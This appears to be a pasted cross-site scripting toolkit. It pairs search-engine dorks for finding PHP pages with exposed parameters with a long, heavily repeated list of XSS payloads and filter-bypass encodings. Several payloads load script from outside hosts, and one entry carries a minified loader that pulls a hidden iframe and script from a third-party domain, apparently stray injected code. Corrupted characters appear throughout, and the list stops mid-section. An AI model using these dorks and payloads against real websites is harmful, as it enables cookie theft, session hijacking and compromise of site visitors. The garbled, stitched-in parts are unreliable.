Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS DORKS
- inurl:".php?cmd="
- inurl:".php?z="
- inurl:".php?q="
- inurl:".php?search="
- inurl:".php?query="
- inurl:".php?searchstring="
- inurl:".php?keyword="
- inurl:".php?file="
- inurl:".php?years="
- inurl:".php?txt="
- inurl:".php?tag="
- inurl:".php?max="
- inurl:".php?from="
- inurl:".php?author="
- inurl:".php?pass="
- inurl:".php?feedback="
- inurl:".php?mail="
- inurl:".php?cat="
- inurl:".php?vote="
- inurl:search.php?q=
- inurl:com_feedpostold/feedpost.php?url=
- inurl:scrapbook.php?id=
- inurl:headersearch.php?sid=
- inurl:/poll/default.asp?catid=inurl:/search_results.php?search=
- -------------XSS Payloads--------------
- Ultimate Cross Site Scripting Attack Cheat Sheet
- Tags to Trigger XSS Attacks:
- onclick
- ondblclick
- onmousedown
- onmousemove
- onmouseover
- onmouseout
- onmouseup
- onkeydown
- onkeypress
- onkeyup
- onabort
- onerror
- onload
- onresize
- onscroll
- onunload
- onsubmit
- onblur
- onchange
- onfocus
- onreset
- onselect
- onMoveOn
- Brackets for Tags
- >"
- ">
- <"
- ><
- >"<
- .\>"</.
- ./>%20<./
- />%20<
- %20/%20>
- %20">%20<
- %3E%3C
- Pjw=
- XSS Strings:
- <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- <SCRIPT>document.cookie=true;</SCRIPT>
- <IMG SRC="jav ascript:document.cookie=true;">
- <IMG SRC="javascript:document.cookie=true;">
- <IMG SRC="  javascript:document.cookie=true;">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- <SCRIPT>document.cookie=true;//<</SCRIPT>
- <SCRIPT <B>document.cookie=true;</SCRIPT>
- <IMG SRC="javascript:document.cookie=true;">
- <iframe src="javascript:document.cookie=true;>
- <SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
- </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- <BODY BACKGROUND="javascript:document.cookie=true;">
- <BODY ONLOAD=document.cookie=true;>
- <IMG DYNSRC="javascript:document.cookie=true;">
- <IMG LOWSRC="javascript:document.cookie=true;">
- <BGSOUND SRC="javascript:document.cookie=true;">
- <BR SIZE="&{document.cookie=true}">
- <LAYER SRC="javascript:document.cookie=true;"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
- �script�document.cookie=true;�/script�
- <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- <TABLE BACKGROUND="javascript:document.cookie=true;">
- <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="width: expression(document.cookie=true);">
- <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
- <XSS STYLE="xss:expression(document.cookie=true)">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
- <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- <STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- <SCRIPT>document.cookie=true;</SCRIPT>
- <BASE HREF="javascript:document.cookie=true;//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"><script>if(top==window){var engageNameSpace="engagens";"undefined"==typeof window[engageNameSpace]&&(window[engageNameSpace]={}),window[engageNameSpace].engageLoader=function(){function e(e){return"undefined"!=typeof e&&null!==e}function t(){var t=document.createElement("script");t.setAttribute("src",s),t.setAttribute("id","fn_engage_script"),t.setAttribute("async",""),(null==document.head||e(document.head))&&(document.head=document.getElementsByTagName("head")[0]),document.head.appendChild(t)}function n(){var t=r();if(e(t)){var n=t;i()&&(n=d(t));var o;try{o=document.documentElement,o.appendChild(n)}catch(c){o=document.body,o.appendChild(n)}a()}}function a(){function e(e){var n=e.data;"l8IframeIsReady"===n.message&&t()}window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onmessage",e)}function r(){var t=document.createElement("iframe");if(e(t)){t.setAttribute("id","fn_engage"),t.setAttribute("src",u),t.setAttribute("target","_blank"),t.setAttribute("frameborder","0");var n=/firefox/i.exec(navigator.userAgent);e(n)&&n.length>0?(t.style.height=0,t.style.width=0):t.style.display="none",t.frameBorder="no"}return t}function i(){var t=!1,n=/android (\d+)/i.exec(navigator.userAgent);return e(n)&&n.length>0&&(t=parseInt(n[1])>=4),t}function d(e){var t=document.createElement("div");return t.setAttribute("id","fn_wrapper_div"),t.style.position="fixed",t.style.display="none",t.ontouchstart=function(){return!0},t.appendChild(e),t}function o(){var t=void 0,a=this,r=function(){e(t)&&(window.clearTimeout(t),t=void 0,n.call(a))};t=window.setTimeout(r,1e4),"function"==typeof window.addEventListener?window.addEventListener("load",r,!1):window.attachEvent("onload",r)}var c="http://globe.moreforme.net",u=c+"/l8/EngageService?v=1",s=c+"/scripts/Engage.js";o()};var engageLoader=new window[engageNameSpace].engageLoader}</script></BODY></HTML>
- <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- <a href="javascript#document.cookie=true;">
- <div onmouseover="document.cookie=true;">
- <img src="javascript:document.cookie=true;">
- <img dynsrc="javascript:document.cookie=true;">
- <input type="image" dynsrc="javascript:document.cookie=true;">
- <bgsound src="javascript:document.cookie=true;">
- &<script>document.cookie=true;</script>
- &{document.cookie=true;};
- <img src=&{document.cookie=true;};>
- <link rel="stylesheet" href="javascript:document.cookie=true;">
- <img src="mocha:document.cookie=true;">@mario_payload
- <img src="livescript:document.cookie=true;">
- <a href="about:<script>document.cookie=true;</script>">
- <body onload="document.cookie=true;">
- <div style="background-image: url(javascript:document.cookie=true;);">
- <div style="behaviour: url([link to code]);">
- <div style="binding: url([link to code]);">
- <div style="width: expression(document.cookie=true;);">
- <style type="text/javascript">document.cookie=true;</style>
- <object classid="clsid:..." codebase="javascript:document.cookie=true;">
- <style><!--</style><script>document.cookie=true;//--></script>
- <<script>document.cookie=true;</script>
- <script>document.cookie=true;//--></script>
- <!-- -- --><script>document.cookie=true;</script><!-- -- -->
- <img src="blah"onmouseover="document.cookie=true;">
- <img src="blah>" onmouseover="document.cookie=true;">
- <xml src="javascript:document.cookie=true;">
- <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Restriction Bypass:
- >"<iframe src=http://global-evolution.info/>@gmail.com
- >"<script>alert(document.cookie)</script><div style="1@gmail.com
- >"<script>alert(document.cookie)</script>@gmail.com
- <html><body>
- <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
- 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
- 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
- om.Char.Code</button></body></html>
- %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
- %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
- %73%63%72%69%70%74%3E
- Obfuscated Bypass:
- >�<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
- XSS with close TAG to escape:
- >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<IMG SRC="jav ascript:document.cookie=true;">
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<IMG SRC="  javascript:document.cookie=true;">
- >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- >"<SCRIPT>document.cookie=true;//<</SCRIPT>
- >"<SCRIPT <B>document.cookie=true;</SCRIPT>
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<iframe src="javascript:document.cookie=true;>
- >"<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
- >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- >"<BODY BACKGROUND="javascript:document.cookie=true;">
- >"<BODY ONLOAD=document.cookie=true;>
- >"<IMG DYNSRC="javascript:document.cookie=true;">
- >"<IMG LOWSRC="javascript:document.cookie=true;">
- >"<BGSOUND SRC="javascript:document.cookie=true;">
- >"<BR SIZE="&{document.cookie=true}">
- >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
- >"�script�document.cookie=true;�/script�
- >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- >"<TABLE BACKGROUND="javascript:document.cookie=true;">
- >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="width: expression(document.cookie=true);">
- >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- >"<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
- >"<XSS STYLE="xss:expression(document.cookie=true)">
- >"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
- >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- >"<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
- >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<BASE HREF="javascript:document.cookie=true;//">
- >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- >"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- >"<a href="javascript#document.cookie=true;">
- >"<div onmouseover="document.cookie=true;">
- >"<img src="javascript:document.cookie=true;">
- >"<img dynsrc="javascript:document.cookie=true;">
- >"<input type="image" dynsrc="javascript:document.cookie=true;">
- >"<bgsound src="javascript:document.cookie=true;">
- >"&<script>document.cookie=true;</script>
- >"&{document.cookie=true;};
- >"<img src=&{document.cookie=true;};>
- >"<link rel="stylesheet" href="javascript:document.cookie=true;">
- >"<img src="mocha:document.cookie=true;">
- >"<img src="livescript:document.cookie=true;">
- >"<a href="about:<script>document.cookie=true;</script>">
- >"<body onload="document.cookie=true;">
- >"<div style="background-image: url(javascript:document.cookie=true;);">
- >"<div style="behaviour: url([link to code]);">
- >"<div style="binding: url([link to code]);">
- >"<div style="width: expression(document.cookie=true;);">
- >"<style type="text/javascript">document.cookie=true;</style>
- >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- >"<style><!--</style><script>document.cookie=true;//--></script>
- >"<<script>document.cookie=true;</script>
- >"<script>document.cookie=true;//--></script>
- >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- >"<img src="blah"onmouseover="document.cookie=true;">
- >"<img src="blah>" onmouseover="document.cookie=true;">
- >"<xml src="javascript:document.cookie=true;">
- >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Others: Random
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';!--"<XSS>=&{()}
- <SCRIPT SRC=http://test.com/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert("RM'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG
- SRC
- =
- "
- j
- a
- v
- ><img id=XSS SRC=x onerror=alert(XSS);>
- ;!--"<XSS>=&{()}"
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- perl -e 'print "<IMG id=XSS SRC=java\0script:alert(\"XSS\")>";' > out
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- \";alert('XSS');//
- <IMG id=XSS SRC='javascript:alert('XSS')
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <BODY BACKGROUND="javascript:alert('XSS')">
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYN id=XSS SRC="javascript:alert('XSS')">
- <IMG LOW id=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <TABLE id=XSS BACKGROUND="javascript:alert('XSS')">
- <TABLE id=XSS><TD BACKGROUND="javascript:alert('XSS')">
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">"
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG id=XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
- <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
- <XML ID="XSS"><I><B><IMG id=XSS SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATAid=XSS SRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML id=XSS SRC="xsstest.xml" ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG id=XSS SRC="&14;javascript:alert('XSS');">
- <SCRIPT <B>=alert('XSS');"></SCRIPT>
- <IFRAME id=XSS SRC="javascript:alert('XSS'); <
- <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
- <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
- <DIV STYLE="background-image: url(javascript:alert('XSS'));">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <a href="javascript#alert('XSS');">
- <div onmouseover="alert('XSS');">,
- <input type="image" dynid=XSS SRC="javascript:alert('XSS');">
- &<script>alert('XSS');</script>">
- <IMG id=XSS SRC=&{alert('XSS');};>
- <a id=XSS href="about:<script>alert('XSS');</script>">
- <DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));">
- <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
- <style><!--</style><script>alert('XSS');//--></script>
- ![CDATA[<!--]]<script>alert('XSS');//--></script>
- <!-- -- --><script>alert('XSS');</script><!-- -- -->
- <img id=XSS SRC="blah"onmouseover="alert('XSS');">
- <img id=XSS SRC="blah>"onmouseover="alert('XSS');">
- <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
- <div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div>
- [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
- <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
- <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X
- <input id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <select id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <textarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <keygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <input id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
- <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//
- <body id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">
- <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>
- <iframe id=XSS / /onload=alert(/XSS/)></iframe>
- <iframe id=XSS / "onload=alert(/XSS/)></iframe>
- <iframe id=XSS///////onload=alert(/XSS/)></iframe>
- <iframe id=XSS "onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
- " onfocus=alert(XSS) "> <"
- " onblur=alert(XSS) "> <"
- " onmouseover=alert(XSS) ">
- " onclick=alert(XSS) ">
- <FRAMESET><FRAME id=XSS SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- </textarea>'"><script>alert(XSS)</script>
- '""><script language="JavaScript"> alert('X \nS \nS');</script>
- </script></script><<<<script><>>>><<<script>alert(XSS)</script>
- <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- '></select><script>alert(XSS)</script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
- ='><script>alert("xss")</script>
- <body background=javascript:'"><script>alert(XSS)</script>></body>
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
- <SCRIPT>alert('XSS');</SCRIPT>
- '';!--"<XSS>=&{()}
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- id=XSS SRC=<IMG 6;avascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS')"
- <SCRIPT>a=/XSS/
- \";alert('XSS');//
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNid=XSS SRC="javascript:alert('XSS')">
- <IMG LOWid=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- http://xxxx.com/scriptlet.html">>
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- http://xxxx.com/xss.css">
- http://xxxx.com/xss.css>; REL=stylesheet">
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <IMG id=XSS SRC="mocha:[code]">
- <IMG id=XSS SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
- http://;URL=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- http://xxxx.com/scriptlet.html">>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- getURL("javascript:alert('XSS')")
- a="get";
- <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas<![CDATA[cript:alert('XSS');">
- http://xxxx.com/xsstest.xml" ID=I>
- <HTML><BODY>
- <? echo('<SCR)';
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- PT id=XSS SRC="http://xxxx.com/xss.js">>
- <sCrIpt>alert(1)</ScRipt>
- <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
- Null-byte character between HTML attribute name and equal sign (IE, Safari).
- <img src='1' onerror\x00=alert(0) />
- Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
- <img src='1' onerror/=alert(0) />
- Vertical tab between HTML attribute name and equal sign (IE, Safari).
- <img src='1' onerror\x0b=alert(0) />
- Null-byte character between equal sign and JavaScript code (IE).
- <img src='1' onerror=\x00alert(0) />
- Null-byte character between characters of HTML attribute names (IE).
- <img src='1' o\x00nerr\x00or=alert(0) />
- Null-byte character before characters of HTML element names (IE).
- <\x00img src='1' onerror=alert(0) />
- Null-byte character after characters of HTML element names (IE, Safari).
- <script\x00>alert(1)</script>
- Null-byte character between characters of HTML element names (IE).
- <i\x00mg src='1' onerror=alert(0) />
- Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
- <img/src='1'/onerror=alert(0)>
- Use vertical tabs instead of whitespace (IE, Safari).
- <img\x0bsrc='1'\x0bonerror=alert(0)>
- Use quotes instead of whitespace in some situations (Safari).
- <img src='1''onerror='alert(0)'>
- <img src='1'"onerror="alert(0)">
- Use null-bytes instead of whitespaces in some situations (IE).
- <img src='1'\x00onerror=alert(0)>
- Just don't use spaces (IE, Firefox, Chrome, Safari).
- <img src='1'onerror=alert(0)>
- Prefix URI schemes.
- Firefox (\x09, \x0a, \x0d, \x20)
- Chrome (Any character \x01 to \x20)
- <iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
- No greater-than characters needed (IE, Firefox, Chrome, Safari).
- <img src='1' onerror='alert(0)' <
- Extra less-than characters (IE, Firefox, Chrome, Safari).
- <<script>alert(0)</script>
- Backslash character between expression and opening parenthesis (IE).
- <style>body{background-color:expression\(alert(1))}</style>
- JavaScript Escaping
- <script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
- Encoding Galore.
- HTML Attribute Encoding
- <img src="1" onerror="alert(1)" />
- <img src="1" onerror="alert(1)" />
- <iframe src="javascript:alert(1)"></iframe>
- <iframe src="javascript:alert(1)"></iframe>
- URL Encoding
- <iframe src="javascript:alert(1)"></iframe>
- <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
- CSS Hexadecimal Encoding (IE specific examples)
